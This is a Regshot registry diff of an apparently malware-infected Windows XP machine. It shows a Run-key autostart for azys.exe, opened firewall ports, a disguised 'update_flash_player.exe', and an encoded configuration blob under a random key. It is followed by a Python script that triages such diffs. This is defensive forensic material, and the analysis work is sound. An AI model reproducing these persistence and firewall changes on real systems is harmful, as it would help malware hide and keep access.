HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\{8050BE41-0268-42B2-900E-11DE9FEDDDF7}\Identity Ordinal: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File2: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\b: 72 00 65 00 67 00 73 00 68 00 6F 00 74 00 2E 00 65 00 78 00 65 00 00 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 72 00 69 00 6B 00 5C 00 C7 30 B9 30 AF 30 C8 30 C3 30 D7 30 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\b: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\c: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\b: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\a: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\a: "regshot.exe"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:Jverfunex.yax: 01 00 00 00 06 00 00 00 B0 03 DE 89 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr: 01 00 00 00 06 00 00 00 40 37 10 8A 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\cebprkc.rkr: 01 00 00 00 06 00 00 00 C0 26 FC 92 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\hcqngr_synfu_cynlre.rkr: 01 00 00 00 06 00 00 00 60 3E 40 BF 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Run\{006579CE-45C4-AD42-587D-A196614C8284}: ""C:\Documents and Settings\rik\Application Data\Zeon\azys.exe""
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\procexp.exe: "Sysinternals Process Explorer"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\update_flash_player.exe: "Windows TaskManager"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\842656.exe: "Windows TaskManager"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\851468.exe: "Windows TaskManager"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\abcd.bat: "abcd"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server ID: 0x00000003
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\Account Name: "WhoWhere インターネット ディレクトリ サービス"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server: "ldap.whowhere.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP URL: "http://www.whowhere.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Search Return: 0x00000064
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Timeout: 0x0000003C
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Authentication: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Simple Search: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server ID: 0x00000002
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\Account Name: "VeriSign インターネット ディレクトリ サービス"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server: "directory.verisign.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP URL: "http://www.verisign.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Return: 0x00000064
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Timeout: 0x0000003C
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Authentication: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Base: "NULL"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Simple Search: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server ID: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\Account Name: "Bigfoot インターネット ディレクトリ サービス"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server: "ldap.bigfoot.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP URL: "http://www.bigfoot.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Search Return: 0x00000064
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Timeout: 0x0000003C
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Authentication: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Simple Search: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server ID: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\Account Name: "Active Directory"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server: "NULL"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Return: 0x00000064
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Timeout: 0x0000003C
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Authentication: 0x00000002
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Simple Search: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Bind DN: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Port: 0x00000CC4
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Resolve Flag: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Secure Connection: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP User Name: "NULL"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Base: "NULL"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVer: 0x00000004
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVerNTDS: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Server ID: 0x00000004
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Default LDAP Account: "Active Directory GC"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\16c6jhji: 10 38 3A 8C EC 37 4D 37 6B 85 7C 00 79 57
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1b52cjj4: 0x8C5B382D
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\2b4gb2j8: 61 31 68 62 6A 44 34 4F 4B 54 63 65 68 55 30 41
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\12jcjhb
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\7ec4g79: 66 44 68 62 6A 49 49 33 4B 54 63 66 74 55 77 41 54 6C 66 46 4F 52 36 52 73 37 6A 58 6C 63 66 5A 45 39 4E 33 56 58 6E 39 6C 7A 77 69 6E 6F 5A 47 79 4D 6A 35 49 62 2B 32 63 4F 30 63 59 51 6A 59 61 6E 36 67 58 56 66 36 33 73 57 76 31 35 48 71 52 34 48 6D 6F 5A 65 75 79 41 2F 53 36 6A 61 4A 4E 63 39 34 44 38 76 53 59 4D 36 73 59 37 52 6C 65 71 74 61 46 54 4B 31 78 6A 71 65 50 55 35 66 54 48 5A 59 70 4F 63 4B 67 79 74 55 6E 43 4E 78 49 76 61 75 4C 51 43 78 6F 37 77 37 69 4F 4D 67 51 2B 55 63 44 41 5A 51 54 73 4D 51 6D 5A 35 6E 64 61 5A 6F 4F 79 7A 7A 77 6A 67 2B 48 71 32 58 58 34 46 42 55 50 63 54 33 62 33 34 68 30 77 39 4C 72 52 32 6D 79 4E 4B 4F 4E 66 36 7A 71 51 69 58 6B 52 73 4F 38 6A 4C 43 4F 43 4D 56 41 48 44 32 49 54 51 36 37 67 6F 4E 62 6B 65 6A 65 67 59 55 57 6B 76 6A 51 41 5A 67 56 6B 7A 32 68 77 67 4D 4F 63 32 6B 55 52 55 77 6F 74 66 57 49 55 7A 37 2B 2B 75 6F 4F 49 69 51 68 62 63 6C 34 42 31 70 44 63 4D 6B 48 34 57 49 7A 56 6F 37 48 71 69 49 74 46 57 45 59 61 31 58 66 39 43 47 33 39 55 31 71 4A 37 2F 64 74 52 6D 41 2B 66 4F 4A 34 4D 6B 54 72 53 45 6E 62 2F 6E 79 38 75 47 71 42 2F 55 61 75 4F 68 51 33 75 79 77 6F 59 76 38 54 51 76 34 34 67 35 64 53 51 59 34 34 53 47 65 44 4C 4F 32 75 78 75 6D 34 43 55 49 48 46 4A 5A 34 45 71 57 4D 4F 6B 31 32 79 4F 37 39 52 66 4A 6A 76 72 52 76 57 43 35 30 32 49 76 6D 65 2B 49 35 5A 4C 39 33 79 39 51 41 51 5A 79 77 68 4C 50 34 50 6F 64 66 59 68 6F 2B 30 57 68 6D 47 30 37 38 65 62 75 72 52 71 78 43 50 46 31 33 6B 48 47 78 48 66 4B 58 54 72 39 56 4D 6B 39 43 6D 39 66 62 72 4C 39 6D 5A 45 39 31 73 5A 6D 61 75 66 42 44 34 56 2F 45 59 74 31 4E 35 4D 50 74 35 50 62 46 44 56 6D 72 55 58 4D 51 33 68 33 56 75 32 43 59 61 67 4E 66 58 57 52 62 33 50 74 38 4E 75 58 47 6A 2F 69 78 39 73 36 45 73 46 30 32 56 37 4B 53 5A 32 73 67 54 33 75 37 61 2F 6E 56 75 74 4F 79 42 6F 46 39 56 45 69 70 76 6E 39 6F 7A 70 54 67 34 48 76 36 58 46 53 69 77 77 44 6E 79 4B 35 
73 6B 4C 65 48 32 6C 70 73 34 72 54 63 4E 70 70 70 76 61 6E 67 7A 70 66 31 66 5A 37 4A 33 72 57 62 4B 56 42 69 67 79 6C 50 34 66 31 75 74 33 4C 64 6A 41 58 49 47 61 72 46 46 56 70 2B 31 46 70 5A 51 2B 67 30 62 45 53 7A 48 2B 52 69 63 65 4A 62 46 72 75 52 43 62 4B 46 32 58 41 79 37 77 4F 34 38 53 73 68 69 48 65 50 4F 4F 75 33 59 64 4D 6E 38 58 32 2F 65 75 72 72 48 68 52 61 4B 4F 31 34 72 75 2B 69 2F 6B 59 45 48 62 65 4F 35 30 58 4F 4E 66 77 6E 53 49 4C 31 66 4D 77 2F 65 55 35 47 2B 59 2B 49 5A 55 62 64 33 62 65 55 39 48 53 6D 66 72 4D 6E 38 65 4C 37 38 77 64 43 63 43 66 5A 45 74 67 53 36 59 67 67 65 58 2F 63 74 5A 5A 45 78 33 68 6D 5A 34 34 5A 4B 6C 71 44 7A 4B 4E 37 77 76 31 6C 36 4B 6F 32 74 66 42 42 30 41 42 66 77 2F 57 58 63 78 35 74 72 46 48 47 5A 63 6E 4D 59 6E 42 6C 52 6D 48 43 75 71 6C 57 31 70 6E 67 41 53 6F 4B 59 73 69 6E 69 59 51 31 6B 46 4D 34 7A 43 54 57 62 50 31 30 7A 41 52 5A 51 54 42 38 67 68 79 6A 33 45 38 69 61 4B 71 44 42 55 70 62 43 72 44 58 39 66 46 6A 6B 58 68 38 77 65 6B 4D 47 42 72 37 63 77 66 54 55 50 71 64 67 79 34 34 31 4B 4A 48 4F 73 65 71 61 61 5A 59 4A 6D 50 6D 38 2B 43 71 73 6E 55 66 67 72 6F 78 6A 79 6D 50 4B 67 65 77 64 76 43 6B 34 68 45 42 45 51 4F 4A 69 71 53 69 48 44 4A 57 61 62 75 4B 34 42 52 47 67 39 4C 47 39 5A 51 46 44 4F 45 47 49 50 51 5A 51 79 6D 6A 61 76 30 42 77 7A 79 75 42 39 6C 42 4B 77 44 44 4A 37 65 35 78 74 65 66 32 49 65 6A 79 58 49 2F 38 78 4A 71 72 6A 53 57 6C 77 77 42 31 74 62 7A 38 47 59 54 41 56 2B 34 6B 75 6E 59 70 76 44 65 6B 75 58 2B 2B 57 76 67 42 53 47 4B 43 70 72 6D 76 67 72 48 4E 31 57 78 73 6F 51 64 45 77 6F 72 71 39 54 46 67 31 4B 69 47 34 70 58 45 77 2B 6F 47 32 6C 7A 43 51 6C 44 71 53 67 4D 4E 59 2B 6B 38 65 71 59 49 76 47 44 32 55 51 2F 64 49 4D 45 34 57 75 49 6D 64 44 55 6F 74 6E 66 70 4C 64 66 78 4F 47 77 4F 42 61 43 55 34 65 36 44 76 67 6F 6A 32 34 48 36 44 4F 6A 34 43 6A 41 30 47 52 55 47 31 33 6C 33 63 71 69 42 2F 56 76 7A 38 6B 78 64 4C 6B 51 6B 57 33 69 44 66 72 70 51 46 4B 35 67 56 45 33 31 
67 4C 4C 35 56 34 43 4B 62 37 31 57 47 31 77 5A 43 69 6E 6C 54 78 30 78 62 59 56 6E 52 41 49 47 79 2F 77 64 70 61 77 56 71 2F 31 38 66 46 44 49 64 4D 77 6F 56 55 56 6E 56 65 69 4D 70 76 48 4D 59 7A 6C 48 44 55 68 73 4C 78 63 38 55 53 75 55 64 30 2F 52 51 35 43 30 30 48 66 39 39 4D 66 43 4D 4F 50 6B 64 37 4E 37 78 5A 62 6E 41 43 58 70 79 7A 4F 52 41 4D 7A 65 30 76 55 6B 52 56 78 4F 65 31 49 79 6C 79 42 6E 74 6F 4A 5A 34 53 59 32 51 77 36 30 4B 38 30 46 77 37 68 31 30 42 59 65 4E 4A 45 64 7A 2B 4B 30 34 79 59 36 77 6E 36 6B 54 77 77 55 67 5A 45 2F 71 41 51 49 4B 4C 45 4F 31 45 71 74 54 74 64 42 58 58 77 72 4D 79 2F 75 64 75 59 63 30 6E 68 66 62 42 63 64 2B 36 6F 6D 41 30 76 33 79 76 4E 68 54 45 6E 4E 77 32 73 70 77 52 2B 59 4F 34 76 48 48 54 66 5A 54 63 50 33 59 6B 33 42 73 2B 57 76 77 67 37 4F 54 63 4C 62 6C 68 6F 47 38 46 53 75 4E 36 75 77 54 56 41 33 63 35 4C 6E 4E 48 66 55 31 4E 4D 44 39 59 4F 74 76 79 6C 39 59 6F 33 72 4F 69 4B 55 44 49 2B 35 43 2B 61 70 30 69 4D 73 37 56 59 50 76 52 2B 54 50 30 2B 55 5A 77 74 70 33 6E 5A 76 38 6F 50 47 62 42 52 45 45 39 4C 7A 6F 57 56 5A 44 7A 42 71 63 6C 7A 31 37 65 48 66 54 4B 50 46 71 53 57 59 35 54 42 33 32 72 2B 2B 2B 34 65 4B 79 30 6A 66 6D 68 44 6C 64 4F 2F 38 56 48 46 6E 6F 34 77 78 33 2F 4D 2F 4D 79 37 33 64 6F 2B 2F 55 71 79 2F 4C 4A 5A 75 62 75 4A 44 62 36 36 62 72 51 32 53 43 4E 50 52 62 4F 67 39 6B 37 6A 61 67 56 49 78 57 58 31 31 75 53 48 58 6F 51 61 6A 63 75 4B 48 58 33 69 74 2F 77 5A 33 6B 4E 50 36 6C 4A 38 78 67 30 62 76 6F 50 59 32 33 39 41 54 63 57 37 49 53 64 4F 45 4C 2B 4D 49 41 6B 44 63 61 49 76 4E 50 45 4C 45 42 72 77 37 72 4C 79 57 4D 4F 41 73 4F 44 30 2B 72 4F 73 6E 6B 30 54 4A 30 6E 59 50 41 4D 45 69 31 57 47 52 33 4F 4A 35 56 55 51 30 73 51 73 48 62 38 4A 69 31 76 66 6F 34 31 34 44 66 63 4B 65 6E 6D 66 68 76 33 73 79 7A 76 2B 57 59 2B 2F 70 6D 37 52 49 49 71 72 47 65 4A 43 42 67 45 4F 6B 32 31 38 4E 2B 76 37 63 45 4E 71 53 56 2F 4B 4C 52 35 66 33 37 56 51 4E 49 61 34 57 49 6D 35 33 2F 6C 59 42 78 71 
6D 70 35 76 31 74 46 32 78 30 78 6D 53 46 47 45 33 52 31 77 4A 47 35 36 7A 64 32 41 4B 35 37 68 39 38 65 4C 39 36 33 72 79 4E 6B 52 4B 68 4E 61 30 6B 55 7A 4E 30 45 75 67 41 2B 56 43 55 52 74 2F 6E 4B 36 45 2F 62 51 70 45 2B 4F 6E 66 4D 37 61 2F 47 66 4F 2F 76 65 51 51 4B 78 61 46 30 62 73 69 77 7A 47 6F 78 4B 38 53 50 2F 43 54 56 2F 55 52 61 37 58 2F 42 49 63 43 43 6B 6D 5A 41 6B 4A 38 65 35 50 62 2B 54 55 72 4B 79 68 42 47 56 33 4B 6A 44 41 62 54 42 42 59 63 68 4C 6B 6F 78 30 48 2F 4C 65 38 58 59 34 77 39 73 63 35 68 47 68 67 78 6D 4A 55 74 69 6C 50 57 6D 45 58 74 59 62 57 44 74 42 2B 4B 36 74 45 45 62 35 58 52 30 33 51 38 4E 46 32 50 39 51 52 4E 75 6A 57 44 6F 77 46 43 38 56 2B 57 50 4A 32 68 64 44 57 63 50 58 48 6B 4E 56 4D 6F 78 2F 6E 54 65 41 64 58 44 34 78 45 53 76 55 57 2B 67 59 51 45 4A 77 38 38 42 56 39 55 33 55 71 6F 58 50 41 46 34 37 4A 6D 6E 63 6B 38 49 65 79 64 6D 65 51 31 48 6C 70 75 45 2F 6C 4D 37 2B 41 44 31 36 78 4D 69 59 46 53 61 48 62 67 4B 5A 48 71 6A 32 67 4A 53 2B 77 67 38 62 4C 56 2B 78 6F 4C 4F 6E 59 38 54 41 41 6C 79 50 6A 4C 7A 77 50 6E 69 67 6B 50 39 75 6B 59 4C 52 43 79 6F 2F 51 45 2F 57 78 31 30 79 47 69 2B 63 52 45 47 49 78 48 73 38 33 57 7A 77 67 76 42 56 68 45 54 43 66 59 61 4A 30 33 45 63 51 73 52 72 67 6F 43 76 47 75 39 51 49 55 57 43 52 59 35 31 6B 6B 6E 65 6F 39 31 5A 45 77 70 4D 36 64 4F 48 50 4C 45 76 54 2F 4A 70 4F 74 68 65 30 62 73 35 47 4D 74 36 49 6D 44 4C 77 31 79 54 75 47 59 53 32 50 64 70 55 4B 61 47 39 55 73 64 68 58 4E 2F 2F 6E 75 49 35 79 6E 73 62 48 4E 4F 50 42 32 7A 41 68 77 6C 36 32 51 51 2F 72 67 49 54 6E 69 74 65 2F 71 63 79 37 6E 34 58 51 46 62 6B 6B 6A 54 7A 66 59 36 52 2B 71 6E 69 49 31 34 66 55 4B 4A 61 77 3D 3D
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1ccc3cfg
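The Regshot diff above is where the behaviour shows up for a responder: the Run key pointing at azys.exe in Application Data, the two firewall exceptions, the ROT13-encoded UserAssist entries recording what was executed, and the random-named Sufyil key whose binary values are really Base64 text. The script below is an added example, not MalwareMustDie's code: it parses Regshot's `KEY\Name: data` lines and flags those four artefact types. The rules and thresholds are the editor's assumptions about what to triage first; the sample lines are copied from the diff above with the SID shortened to `<SID>`.

```python
"""Triage a Regshot 'Values added' diff for persistence, firewall and
execution artefacts.

Added example for this write-up; it is not MalwareMustDie's code. The
detection rules are the editor's assumptions about what a responder wants
flagged first; the sample lines are copied from the Regshot output above
(the SID is shortened to <SID>).
"""
import codecs
import re
import string

# Regshot writes REG_BINARY as space-separated hex byte pairs.
HEX_BYTES = re.compile(r'^(?:[0-9A-Fa-f]{2} ?)+$')
B64_ALPHABET = set(string.ascii_letters + string.digits + '+/=')

# Sample Regshot lines copied from the diff above (constructed input for the demo).
SAMPLE_DIFF = r'''
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\hcqngr_synfu_cynlre.rkr: 01 00 00 00 06 00 00 00 60 3E 40 BF 1D AC CD 01
HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Run\{006579CE-45C4-AD42-587D-A196614C8284}: ""C:\Documents and Settings\rik\Application Data\Zeon\azys.exe""
HKU\<SID>\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\842656.exe: "Windows TaskManager"
HKU\<SID>\Software\Microsoft\Sufyil\2b4gb2j8: 61 31 68 62 6A 44 34 4F 4B 54 63 65 68 55 30 41
HKU\<SID>\Software\Microsoft\Sufyil\1b52cjj4: 0x8C5B382D
'''


def parse_line(line):
    """Split 'KEY\\Name: data' at the first ': ' (Regshot's separator) and
    type the data: 'dword' (0x...), 'bin' (hex pairs), 'str' (quoted) or 'raw'."""
    path, sep, data = line.partition(': ')
    if not sep:
        return None
    data = data.strip()
    if data.startswith('0x'):
        return path, 'dword', int(data, 16)
    if HEX_BYTES.match(data):
        return path, 'bin', bytes.fromhex(data)
    if data.startswith('"') and data.endswith('"'):
        return path, 'str', data.strip('"')
    return path, 'raw', data


def rot13_userassist_name(path):
    """UserAssist value names are ROT13-encoded (HRZR_EHACNGU -> UEME_RUNPATH);
    non-ASCII characters such as the Japanese desktop folder pass through."""
    _, _, encoded = path.partition('\\Count\\')
    return codecs.decode(encoded, 'rot_13')


def looks_like_base64(blob):
    """Binary data whose every byte is a Base64 character is almost certainly
    encoded text rather than a real binary structure; the minimum length
    (an assumption) keeps short values from matching by chance."""
    return len(blob) >= 8 and all(chr(b) in B64_ALPHABET for b in blob)


def triage(diff_text):
    """Return (category, registry path, detail) for every line a rule matches."""
    findings = []
    for line in diff_text.strip().splitlines():
        parsed = parse_line(line.strip())
        if parsed is None:
            continue
        path, kind, payload = parsed
        low = path.lower()
        if '\\currentversion\\run\\' in low:
            findings.append(('persistence', path, 'autostart entry -> %s' % payload))
        elif '\\firewallpolicy\\' in low and '\\globallyopenports\\list\\' in low:
            findings.append(('firewall', path, 'inbound exception -> %s' % payload))
        elif '\\userassist\\' in low and '\\count\\' in low:
            findings.append(('execution', path, rot13_userassist_name(path)))
        elif '\\muicache\\' in low and '\\temp\\' in low:
            findings.append(('execution', path, 'ran from Temp, titled "%s"' % payload))
        elif kind == 'bin' and looks_like_base64(payload):
            findings.append(('config', path,
                             'Base64 text in binary value -> %s' % payload.decode('ascii')))
    return findings


if __name__ == '__main__':
    for category, path, detail in triage(SAMPLE_DIFF):
        print('[%-11s] %s\n             %s' % (category, path, detail))
```

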